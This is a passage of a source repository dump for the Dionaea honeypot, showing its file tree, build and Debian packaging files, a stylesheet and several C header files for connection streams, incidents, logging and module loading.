├── .gitignore ├── LICENSE ├── Makefile.am ├── README ├── conf └── dionaea.conf.dist ├── configure.ac ├── debian ├── changelog ├── compat ├── control └── rules ├── doc └── html │ ├── index.html │ └── screen.css ├── include ├── Makefile.am ├── bistream.h ├── connection.h ├── dionaea.h ├── dns.h ├── incident.h ├── log.h ├── modules.h ├── node_info.h ├── pchild.h ├── processor.h ├── protocol.h ├── refcount.h ├── signals.h ├── threads.h └── util.h ├── m4 ├── az_bind_ipv4_mapped_localhost.m4 └── az_python.m4 ├── modules ├── Makefile.am ├── curl │ ├── Makefile.am │ ├── module.c │ └── module.h ├── emu │ ├── Makefile.am │ ├── detect.c │ ├── emulate.c │ ├── hooks.c │ ├── module.c │ ├── module.h │ └── profile.c ├── nc │ ├── Makefile.am │ ├── nc.c │ └── nc.h ├── nfq │ ├── Makefile.am │ └── nfq.c ├── nl │ ├── Makefile.am │ └── module.c ├── pcap │ ├── Makefile.am │ └── pcap.c ├── python │ ├── Makefile.am │ ├── binding.pyx │ ├── module.c │ ├── module.h │ ├── pyev │ │ ├── Async.c │ │ ├── Check.c │ │ ├── Child.c │ │ ├── Embed.c │ │ ├── Fork.c │ │ ├── Idle.c │ │ ├── Io.c │ │ ├── Loop.c │ │ ├── Periodic.c │ │ ├── PeriodicBase.c │ │ ├── Prepare.c │ │ ├── Scheduler.c │ │ ├── Signal.c │ │ ├── Stat.c │ │ ├── Timer.c │ │ ├── Watcher.c │ │ ├── pyev.c │ │ └── pyev.h │ ├── scripts │ │ ├── Makefile.am │ │ ├── __init__.py │ │ ├── cmd.py │ │ ├── echo.py │ │ ├── emu.py │ │ ├── fail2ban.py │ │ ├── ftp.py │ │ ├── hpfeeds.py │ │ ├── http.py │ │ ├── ihandlers.py │ │ ├── log.py │ │ ├── logsql.py │ │ ├── logxmpp.py │ │ ├── mirror.py │ │ ├── mqtt │ │ │ ├── __init__.py │ │ │ ├── include │ │ │ │ ├── __init__.py │ │ │ │ └── packets.py │ │ │ └── mqtt.py │ │ ├── mssql │ │ │ ├── __init__.py │ │ │ ├── include │ │ │ │ ├── __init__.py │ │ │ │ └── tds.py │ │ │ └── mssql.py │ │ ├── mwserv.py │ │ ├── mysql │ │ │ ├── __init__.py │ │ │ ├── include │ │ │ │ ├── __init__.py │ │ │ │ ├── fields.py │ │ │ │ ├── packets.py │ │ │ │ └── packets.py_ │ │ │ └── mysql.py │ │ ├── ndrlib.py │ │ ├── nfq.py │ │ ├── p0f.py │ │ ├── 
pptp │ │ │ ├── __init__.py │ │ │ ├── include │ │ │ │ ├── __init__.py │ │ │ │ └── packets.py │ │ │ └── pptp.py │ │ ├── services.py │ │ ├── sip │ │ │ ├── __init__.py │ │ │ ├── extras.py │ │ │ ├── rfc2396.py │ │ │ ├── rfc2617.py │ │ │ ├── rfc3261.py │ │ │ └── rfc4566.py │ │ ├── smb │ │ │ ├── __init__.py │ │ │ ├── include │ │ │ │ ├── __init__.py │ │ │ │ ├── asn1 │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── asn1.py │ │ │ │ │ ├── ber.py │ │ │ │ │ └── mib.py │ │ │ │ ├── asn1fields.py │ │ │ │ ├── asn1packet.py │ │ │ │ ├── fieldtypes.py │ │ │ │ ├── gssapifields.py │ │ │ │ ├── helpers.py │ │ │ │ ├── ntlmfields.py │ │ │ │ ├── packet.py │ │ │ │ └── smbfields.py │ │ │ ├── rpcservices.py │ │ │ └── smb.py │ │ ├── store.py │ │ ├── submit_http.py │ │ ├── surfids.py │ │ ├── test.py │ │ ├── tftp.py │ │ ├── upnp │ │ │ ├── __init__.py │ │ │ └── upnp.py │ │ ├── util.py │ │ └── virustotal.py │ ├── setup.py.in │ └── util │ │ ├── Makefile.am │ │ ├── csv2sqlite.py │ │ ├── gnuplotsql.py │ │ ├── gnuplotsql │ │ ├── gnuplot.example │ │ └── gnuplot.svg.example │ │ ├── logsql2postgres.py │ │ ├── readlogsqltree.py │ │ ├── retry.py │ │ ├── updateccs.py │ │ └── xmpp │ │ ├── pg_backend.py │ │ └── pg_schema.sql └── xmatch │ ├── Makefile.am │ ├── module.c │ ├── module.h │ └── xmatch.c ├── src ├── LICENSE.openssl ├── Makefile.am ├── bistream.c ├── connection.c ├── dionaea.c ├── dns.c ├── incident.c ├── log.c ├── modules.c ├── node_info.c ├── pchild.c ├── processor.c ├── refcount.c ├── signals.c ├── threads.c └── util.c └── tests ├── sip ├── README ├── functional-test-sip.py ├── run-bt4.sh ├── run-bt5.sh ├── run-tests.sh └── sipp │ ├── error_sdp.xml │ ├── newmethod.xml │ ├── options.xml │ ├── register.xml │ ├── register_pw.xml │ ├── uac.xml │ ├── user.csv │ └── user_pw.csv └── smb └── metasploit.rc /.gitignore: -------------------------------------------------------------------------------- 1 | # intermediate object files 2 | *.o 3 | *.lo 4 | *.la 5 | 6 | # automake 7 | Makefile 8 | Makefile.in 9 | .deps 10 | 
.libs 11 | config.* 12 | aclocal.m4 13 | autom4te.cache/ 14 | configure 15 | depcomp 16 | install-sh 17 | libtool 18 | ltmain.sh 19 | missing 20 | stamp-h1 21 | 22 | # slickedit 23 | *.vpj 24 | *.vpw 25 | *.vpwhistu 26 | *.vtg 27 | 28 | # project specific 29 | src/dionaea 30 | modules/python/binding.c 31 | modules/python/build/ 32 | modules/python/setup.py 33 | 34 | *.pyc 35 | -------------------------------------------------------------------------------- /Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | SUBDIRS = src include modules 6 | 7 | EXTRA_DIST = configure.ac conf/dionaea.conf.dist 8 | 9 | install-data-local: 10 | $(mkinstalldirs) $(DESTDIR)$(sysconfdir) 11 | $(mkinstalldirs) $(DESTDIR)$(sysconfdir)/dionaea 12 | $(mkinstalldirs) $(DESTDIR)$(localstatedir) 13 | $(mkinstalldirs) $(DESTDIR)$(localstatedir)/run/ 14 | $(mkinstalldirs) $(DESTDIR)$(localstatedir)/dionaea/ 15 | $(mkinstalldirs) $(DESTDIR)$(localstatedir)/dionaea/binaries/ 16 | $(mkinstalldirs) $(DESTDIR)$(localstatedir)/dionaea/bistreams/ 17 | $(mkinstalldirs) $(DESTDIR)$(localstatedir)/dionaea/wwwroot/ 18 | $(INSTALL_DATA) $(srcdir)/conf/dionaea.conf.dist $(DESTDIR)$(sysconfdir)/dionaea/dionaea.conf.dist; 19 | if [ ! 
-e $(DESTDIR)$(sysconfdir)/dionaea/dionaea.conf ]; then \ 20 | $(INSTALL_DATA) $(srcdir)/conf/dionaea.conf.dist $(DESTDIR)$(sysconfdir)/dionaea/dionaea.conf; \ 21 | fi 22 | $(mkinstalldirs) $(DESTDIR)$(localstatedir)/log 23 | 24 | 25 | -------------------------------------------------------------------------------- /debian/changelog: -------------------------------------------------------------------------------- 1 | dionaea (0.1.0) lenny; urgency=low 2 | 3 | * Initial release 4 | 5 | -- kees Wed, 3 Mar 2010 16:50:17 +0100 6 | -------------------------------------------------------------------------------- /debian/compat: -------------------------------------------------------------------------------- 1 | 5 2 | -------------------------------------------------------------------------------- /debian/control: -------------------------------------------------------------------------------- 1 | Source: dionaea 2 | Section: misc 3 | Priority: optional 4 | Maintainer: 5 | Standards-Version: 3.7.2 6 | Build-Depends: debhelper (>= 5), pkg-config (>=0.22), libglib2.0-dev (>= 2.22.2), libcurl4-openssl-dev (>= 7.19.5), python3.2-dev (>= 3.2), cython (>= 0.14.2), libudns-dev (>= 0.0.9), libssl-dev (>= 0.9.8g), liblcfg (>= 0.2.0), libemu (>= 0.2.0), libev-dev (>= 4.0) 7 | 8 | Package: dionaea 9 | Architecture: i386 amd64 10 | Priority: optional 11 | Depends: libglib2.0-0 (>= 2.22.2), libcurl3 (>= 7.19.5), libpython3.2 (>= 3.2), libudns0 (>= 0.0.9), libssl0.9.8 (>= 0.9.8g), liblcfg (>= 0.2.0), libemu (>= 0.2.0), libev3 (>= 4.0) 12 | Description: dionaea 13 | Dionaea is meant to be a Nepenthes successor, embedding Python 14 | as scripting language, using libemu to detect 15 | shellcodes, supporting IPv6 and TLS. 
16 | -------------------------------------------------------------------------------- /debian/rules: -------------------------------------------------------------------------------- 1 | #!/usr/bin/make -f 2 | 3 | package = dionaea 4 | 5 | CC = gcc 6 | #CFLAGS = -g -Wall 7 | #CFLAGS = -Werror 8 | 9 | #ifeq (,$(findstring noopt,$(DEB_BUILD_OPTIONS))) 10 | # CFLAGS += -O2 11 | #endif 12 | 13 | #export DH_VERBOSE=1 14 | 15 | clean: 16 | rm -f build-stamp 17 | if [ -f Makefile ]; then $(MAKE) clean distclean; fi 18 | rm -f debian/*README.Debian 19 | dh_clean 20 | 21 | config.h: clean 22 | dh_testdir 23 | dh_auto_configure 24 | 25 | build: build-stamp 26 | 27 | build-stamp: config.h 28 | dh_auto_build 29 | touch $@ 30 | 31 | 32 | install: build 33 | dh_testdir 34 | dh_testroot 35 | dh_installdirs 36 | dh_auto_install 37 | rm $(CURDIR)/debian/dionaea/usr/lib/dionaea/python/dionaea/core.so 38 | dh_link usr/lib/dionaea/python.so usr/lib/dionaea/python/dionaea/core.so 39 | dh_link usr/lib/dionaea/python.so usr/lib/dionaea/python/dionaea/pyev.so 40 | 41 | binary-indep: install 42 | # There are no architecture-independent files to be uploaded 43 | # generated by this package. If there were any they would be 44 | # made here. 
45 | 46 | binary-arch: install 47 | dh_testdir -a 48 | dh_testroot -a 49 | # dh_installdocs -a NEWS 50 | # dh_installchangelogs -a ChangeLog 51 | dh_strip -a 52 | dh_compress -a 53 | dh_fixperms -a 54 | dh_installdeb -a 55 | dh_shlibdeps -a 56 | dh_gencontrol -a 57 | dh_md5sums -a 58 | dh_builddeb -a 59 | 60 | binary: binary-indep binary-arch 61 | 62 | .PHONY: binary binary-arch binary-indep clean checkroot 63 | -------------------------------------------------------------------------------- /doc/html/screen.css: -------------------------------------------------------------------------------- 1 | body { 2 | margin: auto; 3 | width: 50em; 4 | font-family: "Verdana"; 5 | line-height: 140%; 6 | } 7 | 8 | h2 { 9 | font-variant: small-caps; 10 | border-bottom: 1px solid #888; 11 | color: #333; 12 | } 13 | 14 | a { 15 | color: #7ea419; 16 | text-decoration: none; 17 | border-bottom: 1px solid black; 18 | } 19 | 20 | a:hover { 21 | background-color: #fffdf1; 22 | border-bottom: 1px solid #2cbd44; 23 | } 24 | 25 | pre, kbd { 26 | color: #6e009e; 27 | } 28 | 29 | pre { 30 | margin-left: 3em; 31 | line-height: 1.2em; 32 | overflow:auto; 33 | } 34 | 35 | code { 36 | margin-left: 3em; 37 | color: #33a19e; 38 | white-space: wrap; 39 | } 40 | 41 | ul { 42 | list-style-type: square; 43 | } 44 | 45 | p, dl, ul { 46 | margin-left: 1em; 47 | } 48 | 49 | dt { 50 | font-weight: bold; 51 | } 52 | 53 | dl.faq dt:before { 54 | content: "Q: "; 55 | } 56 | 57 | dl.faq dt { 58 | margin-top: 1em; 59 | } 60 | 61 | dl.faq dd:before { 62 | content: "A: "; 63 | font-weight: bold; 64 | } 65 | 66 | #header { 67 | background-color: #7ea419; 68 | padding: 1em; 69 | } 70 | 71 | #header h1, #header h3 { 72 | color: white; 73 | margin: 0; 74 | } 75 | 76 | h1 {font-size: 160%; margin-left: 0px; font-weight: bold;} 77 | h2 {font-size: 150%; margin-left: 10px;} 78 | h3 {font-size: 140%; margin-left: 20px; border-bottom: none; font-weight: bold;} 79 | h4 {font-size: 120%; margin-left: 30px; border-bottom: 
none; font-weight: bold;} 80 | h5 {font-size: 100%; margin-left: 40px; border-bottom: none; font-weight: bold;} 81 | 82 | 83 | div.level1 {margin-left: 3px;} 84 | div.level2 {margin-left: 13px;} 85 | div.level3 {margin-left: 23px;} 86 | div.level4 {margin-left: 33px;} 87 | div.level5 {margin-left: 43px;} 88 | 89 | 90 | #nav { 91 | float: left; 92 | list-style-type: none; 93 | padding: 0; 94 | } 95 | 96 | #nav li a { 97 | border: none; 98 | font-weight: bold; 99 | text-decoration: none; 100 | color: black; 101 | padding: 3px 10px 3px 10px; 102 | } 103 | 104 | #content { 105 | background-color: white; 106 | color: black; 107 | padding: 2em; 108 | border-left: 4px solid #ddd; 109 | border-right: 4px solid #ddd; 110 | } 111 | 112 | #about { 113 | font-style: italic; 114 | float: left; 115 | width: 50%; 116 | } 117 | 118 | #separator { 119 | clear: left; 120 | visibility: hidden; 121 | padding-top: 1em; 122 | } 123 | -------------------------------------------------------------------------------- /include/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | includedir = $(prefix)/include/dionaea 6 | 7 | noinst_HEADERS = dionaea.h 8 | noinst_HEADERS += dns.h 9 | noinst_HEADERS += refcount.h 10 | noinst_HEADERS += node_info.h 11 | noinst_HEADERS += util.h 12 | noinst_HEADERS += log.h 13 | noinst_HEADERS += protocol.h 14 | noinst_HEADERS += modules.h 15 | noinst_HEADERS += connection.h 16 | noinst_HEADERS += pchild.h 17 | noinst_HEADERS += signals.h 18 | noinst_HEADERS += incident.h 19 | noinst_HEADERS += threads.h 20 | noinst_HEADERS += bistream.h 21 | noinst_HEADERS += processor.h 22 | 23 | 24 | -------------------------------------------------------------------------------- /include/bistream.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | 
* - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #ifndef HAVE_BISTEAM_H 29 | #define HAVE_BISTEAM_H 30 | 31 | #include 32 | #include 33 | 34 | 35 | enum bistream_direction 36 | { 37 | bistream_in, 38 | bistream_out 39 | }; 40 | 41 | struct stream_chunk 42 | { 43 | GString *data; 44 | uint32_t bistream_offset; 45 | uint32_t stream_offset; 46 | enum bistream_direction direction; 47 | }; 48 | 49 | struct bistream 50 | { 51 | GList *stream_sequence; 52 | GMutex *mutex; 53 | 54 | struct stream 55 | { 56 | GList *stream_chunks; 57 | GMutex *mutex; 58 | }streams[2]; 59 | }; 60 | 61 | uint32_t sizeof_stream_chunks(GList *stream_chunks); 62 | 63 | struct bistream *bistream_new(void); 64 | void bistream_free(struct bistream *bs); 65 | 66 | void bistream_data_add(struct bistream *bs, enum bistream_direction, void *data, uint32_t size); 67 | void bistream_debug(struct bistream *bs); 68 | 69 | int32_t bistream_get_stream(struct bistream *bs, enum bistream_direction dir, uint32_t start, int32_t end, void **data); 70 | 71 | 
void print_stream_chunk(struct stream_chunk *sc); 72 | void print_stream_chunk2(struct stream_chunk *sc); 73 | 74 | #endif 75 | -------------------------------------------------------------------------------- /include/dionaea.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #ifndef HAVE_DIONAEA_H 29 | #define HAVE_DIONAEA_H 30 | 31 | struct lcfg; 32 | struct lcfgx_tree_node; 33 | 34 | struct dns; 35 | struct modules; 36 | struct pchild; 37 | struct logging; 38 | struct ihandlers; 39 | struct threads; 40 | 41 | struct version 42 | { 43 | struct 44 | { 45 | char *version; 46 | } dionaea; 47 | struct 48 | { 49 | char *os; 50 | char *arch; 51 | char *date; 52 | char *time; 53 | char *name; 54 | char *version; 55 | } compiler; 56 | struct 57 | { 58 | char *node; 59 | char *sys; 60 | char *machine; 61 | char *release; 62 | } info; 63 | }; 64 | 65 | 66 | struct dionaea 67 | { 68 | struct 69 | { 70 | struct lcfg *config; 71 | struct lcfgx_tree_node *root; 72 | char *name; 73 | } config; 74 | 75 | struct 76 | { 77 | int fds; 78 | } limits; 79 | 80 | struct version *version; 81 | 82 | struct dns *dns; 83 | 84 | struct ev_loop *loop; 85 | 86 | struct modules *modules; 87 | 88 | struct pchild *pchild; 89 | 90 | struct logging *logging; 91 | 92 | struct signals *signals; 93 | 94 | struct ihandlers *ihandlers; 95 | 96 | struct threads *threads; 97 | 98 | struct processors *processors; 99 | }; 100 | 101 | 102 | 103 | extern struct dionaea *g_dionaea; 104 | 105 | 106 | 107 | #endif 108 | -------------------------------------------------------------------------------- /include/dns.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your 
option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | 30 | struct dns_ctx; 31 | 32 | struct dns 33 | { 34 | struct dns_ctx *dns; 35 | struct ev_timer dns_timeout; 36 | struct ev_io io_in; 37 | int socket; 38 | }; 39 | 40 | void udns_io_in_cb(EV_P_ struct ev_io *w, int revents); 41 | void udns_timeout_cb(EV_P_ struct ev_timer *w, int revents); 42 | void udns_set_timeout_cb(struct dns_ctx *ctx, int timeout, void *data); 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /include/incident.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | #include 30 | #include 31 | 32 | struct incident; 33 | 34 | struct ihandlers 35 | { 36 | GList *handlers; 37 | }; 38 | 39 | 40 | typedef void (*ihandler_cb)(struct incident *i, void *ctx); 41 | struct ihandler 42 | { 43 | const char *path; 44 | GPatternSpec *match; 45 | ihandler_cb cb; 46 | void *ctx; 47 | }; 48 | 49 | struct ihandler *ihandler_new(char *pattern, ihandler_cb cb, void *ctx); 50 | void ihandler_free(struct ihandler *i); 51 | 52 | enum opaque_data_type 53 | { 54 | opaque_type_none, 55 | opaque_type_string, 56 | opaque_type_int, 57 | opaque_type_ptr, 58 | opaque_type_list, 59 | opaque_type_dict 60 | }; 61 | 62 | struct connection; 63 | 64 | struct opaque_data 65 | { 66 | enum opaque_data_type type; 67 | char *name; 68 | union 69 | { 70 | GString *string; 71 | long int integer; 72 | uintptr_t ptr; 73 | struct connection *con; 74 | GList *list; 75 | GHashTable *dict; 76 | }opaque; 77 | }; 78 | struct opaque_data *opaque_data_new(void); 79 | void opaque_data_free(struct opaque_data *d); 80 | void opaque_data_string_set(struct opaque_data *d, GString *val); 81 | void opaque_data_string_get(struct opaque_data *d, GString **val); 82 | void opaque_data_int_set(struct opaque_data *d, long int val); 83 | void opaque_data_int_get(struct opaque_data *d, long int *val); 84 | void opaque_data_con_set(struct opaque_data *d, struct connection *val); 85 | void opaque_data_con_get(struct opaque_data *d, struct connection **val); 86 | void opaque_data_list_set(struct opaque_data *d, GList *val); 87 | void 
opaque_data_list_get(struct opaque_data *d, GList **val); 88 | void opaque_data_dict_set(struct opaque_data *d, GHashTable *val); 89 | void opaque_data_dict_get(struct opaque_data *d, GHashTable **val); 90 | void opaque_data_none_set(struct opaque_data *d); 91 | void opaque_data_none_get(struct opaque_data *d); 92 | 93 | struct incident 94 | { 95 | char *origin; 96 | GHashTable *data; 97 | }; 98 | 99 | 100 | 101 | struct incident *incident_new(const char *origin); 102 | void incident_free(struct incident *e); 103 | bool incident_value_int_set(struct incident *e, const char *name, long int val); 104 | bool incident_value_int_get(struct incident *e, const char *name, long int *val); 105 | bool incident_value_con_set(struct incident *e, const char *name, struct connection *val); 106 | bool incident_value_con_get(struct incident *e, const char *name, struct connection **val); 107 | bool incident_value_string_set(struct incident *e, const char *name, GString *str); 108 | bool incident_value_string_get(struct incident *e, const char *name, GString **str); 109 | bool incident_value_list_set(struct incident *e, const char *name, GList *list); 110 | bool incident_value_list_get(struct incident *e, const char *name, GList **list); 111 | bool incident_value_dict_set(struct incident *e, const char *name, GHashTable *val); 112 | bool incident_value_dict_get(struct incident *e, const char *name, GHashTable **val); 113 | bool incident_value_none_set(struct incident *e, const char *name); 114 | bool incident_value_none_get(struct incident *e, const char *name); 115 | 116 | void incident_dump(struct incident *e); 117 | 118 | bool incident_keys_get(struct incident *e, char ***keys); 119 | void incident_report(struct incident *i); 120 | 121 | /* 122 | struct incident *e = incident_new("test"); 123 | incident_value_int_set(e, "int_test", 4711); 124 | incident_value_string_set(e, "string_test", g_string_new("4711")); 125 | incident_value_con_set(e, "ptr_test", 0x4711); 126 | 
incident_dump(e); 127 | incident_report(e); 128 | incident_free(e) 129 | */ 130 | 131 | -------------------------------------------------------------------------------- /include/log.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | #include 30 | #include 31 | #include "config.h" 32 | 33 | #define STRINGIFY(x) #x 34 | #define TOSTRING(x) STRINGIFY(x) 35 | #define AT __FILE__ ":" TOSTRING(__LINE__) 36 | 37 | #ifdef G_LOG_DOMAIN 38 | #undef G_LOG_DOMAIN 39 | #ifdef DEBUG 40 | #define G_LOG_DOMAIN D_LOG_DOMAIN " " AT 41 | #else 42 | #define G_LOG_DOMAIN D_LOG_DOMAIN 43 | #endif /* DEBUG */ 44 | #endif 45 | 46 | 47 | #define g_info(...) g_log(G_LOG_DOMAIN, G_LOG_LEVEL_INFO, __VA_ARGS__) 48 | 49 | #ifdef NDEBUG 50 | #undef g_debug 51 | #define g_debug(...) 
52 | #endif 53 | 54 | #ifdef PERFORMANCE 55 | #undef g_info 56 | #define g_info(...) 57 | #undef g_message 58 | #define g_message(...) 59 | #undef g_warning 60 | #define g_warning(...) 61 | #endif 62 | 63 | 64 | struct logging 65 | { 66 | GMutex *lock; 67 | GList *loggers; 68 | }; 69 | 70 | struct log_level_map 71 | { 72 | const char *name; 73 | int mask; 74 | }; 75 | 76 | struct domain_filter 77 | { 78 | char *domain; 79 | GPatternSpec *pattern; 80 | }; 81 | 82 | struct log_filter 83 | { 84 | struct domain_filter **domains; 85 | int mask; 86 | }; 87 | struct log_filter *log_filter_new(const char *domains, const char *levels); 88 | bool log_filter_match(struct log_filter *filter, const char *log_domain, int log_level); 89 | 90 | extern struct log_level_map log_level_mapping[]; 91 | 92 | struct logger; 93 | typedef bool (*log_util_fn)(struct logger *, void *data); 94 | struct logger 95 | { 96 | log_util_fn open; 97 | log_util_fn close; 98 | log_util_fn hup; 99 | log_util_fn flush; 100 | GLogFunc log; 101 | int fd; 102 | void *data; 103 | }; 104 | struct logger *logger_new(GLogFunc log, log_util_fn xopen, log_util_fn hup, log_util_fn xclose, log_util_fn xflush, void *data); 105 | 106 | 107 | void log_multiplexer(const gchar *log_domain, 108 | GLogLevelFlags log_level, 109 | const gchar *message, 110 | gpointer user_data); 111 | 112 | 113 | struct logger_file_data 114 | { 115 | char file[PATH_MAX+1]; 116 | FILE *f; 117 | struct log_filter *filter; 118 | }; 119 | 120 | void logger_file_log(const gchar *log_domain, 121 | GLogLevelFlags log_level, 122 | const gchar *message, 123 | gpointer user_data); 124 | bool logger_file_open(struct logger *l, void *data); 125 | bool logger_file_close(struct logger *l, void *data); 126 | bool logger_file_hup(struct logger *l, void *data); 127 | 128 | 129 | bool logger_stdout_open(struct logger *l, void *data); 130 | void logger_stdout_log(const gchar *log_domain, 131 | GLogLevelFlags log_level, 132 | const gchar *message, 133 | 
gpointer user_data); 134 | bool logger_file_flush(struct logger *l, void *data); 135 | 136 | -------------------------------------------------------------------------------- /include/modules.h: -------------------------------------------------------------------------------- 1 | #ifndef HAVE_MODULES_H 2 | #define HAVE_MODULES_H 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | #include 9 | #include 10 | 11 | struct dionaea; 12 | 13 | struct module; 14 | 15 | 16 | 17 | typedef struct module_api *(*module_init_function)(struct dionaea *d); 18 | 19 | typedef bool (*module_config_function)(struct lcfgx_tree_node *node); 20 | typedef bool (*module_start_function)(void); 21 | typedef bool (*module_new_function)(struct dionaea *d); 22 | typedef bool (*module_free_function)(void); 23 | 24 | /** 25 | * this is the api to interact with modules 26 | * startup order is 27 | * * config 28 | * * prepare 29 | * * new 30 | * after prepare privs are dropped 31 | * 32 | * hup is meant to support SIGHUP in modules 33 | * 34 | * shutdown order 35 | * * free 36 | */ 37 | struct module_api 38 | { 39 | module_config_function config; 40 | module_start_function start; 41 | module_start_function prepare; 42 | module_new_function new; 43 | module_free_function free; 44 | module_config_function hup; 45 | }; 46 | 47 | struct module 48 | { 49 | char *name; 50 | GModule *module; 51 | module_init_function module_init; 52 | struct lcfgx_tree_node *config; 53 | struct module_api api; 54 | }; 55 | 56 | struct module *module_new(const char *name, const char *path); 57 | void module_free(struct module *module); 58 | 59 | 60 | struct modules 61 | { 62 | GList *modules; 63 | }; 64 | 65 | 66 | void modules_load(struct lcfgx_tree_node *node); 67 | void modules_unload(void); 68 | 69 | /** 70 | * module bootstrapping order 71 | * 72 | * config: ... 
73 | * 74 | * prepare: initialize shared memory for pchild (if required) 75 | * 76 | * ->fork pchild 77 | * 78 | * new: bind & do things 79 | * 80 | * drop privs & chroot 81 | * 82 | * start: run in your chroot, open db handles 83 | */ 84 | 85 | 86 | 87 | void modules_config(void); 88 | void modules_prepare(void); 89 | void modules_new(void); 90 | void modules_start(void); 91 | void modules_free(void); 92 | void modules_hup(void); 93 | 94 | #endif 95 | -------------------------------------------------------------------------------- /include/node_info.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
